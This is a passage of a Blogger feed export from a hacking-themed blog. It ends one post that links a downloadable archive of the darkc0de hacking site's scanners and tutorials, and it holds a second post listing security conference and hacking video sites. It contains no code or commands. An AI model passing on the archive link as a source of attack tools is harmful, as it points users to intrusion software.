font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;scanners&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;tutorials&lt;/li&gt;&lt;/ul&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;b style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;Download:&lt;/b&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://rapidshare.com/files/407123258/darkc0de.tar.gz.html" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://rapidshare.com/files/40712325...de.tar.gz.html&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;Online version&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://mysterie.fr/prog/darkc0de/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://mysterie.fr/prog/darkc0de/&lt;/a&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-2039910979897852449?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/2039910979897852449/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/darkc0decom-archive.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/2039910979897852449'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/2039910979897852449'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/darkc0decom-archive.html' title='darkc0de.com [archive]'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-5729549872332731288</id><published>2012-01-29T17:09:00.000+06:00</published><updated>2012-01-29T17:09:12.928+06:00</updated><title type='text'>Security Video [site's]</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;Black Hat&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" height="160" id="ncode_imageresizer_container_4" src="http://i.minus.com/iHmBnmOjIcOZg.PNG" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" width="500" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="https://www.blackhat.com/html/archives.html" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;https://www.blackhat.com/html/archives.html&lt;/a&gt;&lt;span style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;&amp;nbsp;[&lt;/span&gt;&lt;i style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;video presentation&lt;/i&gt;&lt;span style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;]&lt;/span&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;DEF CON&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" height="173" id="ncode_imageresizer_container_5" src="http://i.minus.com/iwAHPm12rXMwB.PNG" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" width="500" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="https://media.defcon.org/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;https://media.defcon.org/&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;OWASP&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" height="92" id="ncode_imageresizer_container_2" src="https://www.owasp.org/skins/monobook/ologo.png" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" width="500" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="https://www.owasp.org/index.php/Category:OWASP_Video" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;https://www.owasp.org/index.php/Category:OWASP_Video&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;Imperva&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://i.minus.com/iiznGGYb1ZTi6.PNG" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.imperva.com/resources/videos.asp" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.imperva.com/resources/videos.asp&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;Hacking Illustrated&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://i.minus.com/iLm5btD9kikj0.PNG" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.irongeek.com/i.php?page=security/hackingillustrated" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.irongeek.com/i.php?page=s...ingillustrated&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;The Hacker News Network&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" height="65" id="ncode_imageresizer_container_1" src="http://www.hackernews.com/wp-content/themes/black-3column/images/logo.png" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" width="500" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.hackernews.com/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.hackernews.com/&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;SecTor [Security Conference Toronto Canada]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://www.sector.ca/images/logo.png" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.sector.ca/presentations2010.htm" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.sector.ca/presentations2010.htm&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;][akep&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://www.xakep.ru/i/new_i/logo.gif" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.xakep.ru/articles/video/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.xakep.ru/articles/video/&lt;/a&gt;&lt;span style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;&amp;nbsp;[&lt;/span&gt;&lt;i style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;rus&lt;/i&gt;&lt;span style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;]&lt;/span&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;VULNERABILITY-LAB&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" height="108" id="ncode_imageresizer_container_3" src="http://www.vulnerability-lab.com/gfx/logo-header.png" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" width="500" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.youtube.com/user/vulnerability0lab" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.youtube.com/user/vulnerability0lab&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;PhreakNIC&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://i.minus.com/ibofyK68StmwEz.PNG" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.phreaknic.info/Videos/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.phreaknic.info/Videos/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;Hackers Center&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://www.hackerscenter.com/templates/gk_sportmaxum/images/logo.png" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.hackerscenter.com/index.php?/Video/General/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.hackerscenter.com/index.php?/Video/General/&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;Good.net&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://avondale.good.net/static/goodnet-logo-navi.png" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://avondale.good.net/dl/bd/" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://avondale.good.net/dl/bd/&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;SecDocs&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://secdocs.lonerunners.net/images/company_name.png" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://secdocs.lonerunners.net/documents/category/3-video" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://secdocs.lonerunners.net/docum...tegory/3-video&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;RealHacker Network&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" src="http://www.realhacker.net/imgs/logo.png" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.realhacker.net/category/videos" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.realhacker.net/category/videos&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;Hacking Forensic Security [HFS]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.youtube.com/user/ChRiStIaAn008" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.youtube.com/user/ChRiStIaAn008&lt;/a&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: darkorange;"&gt;Hacking Conferences Worldwide&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;a href="http://www.youtube.com/user/HackingCons" style="background-color: #333333; color: #417394; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;" target="_blank"&gt;http://www.youtube.com/user/HackingCons&lt;/a&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-5729549872332731288?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/5729549872332731288/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/security-video-sites.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5729549872332731288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5729549872332731288'/><link rel='alternate' type='text/html' 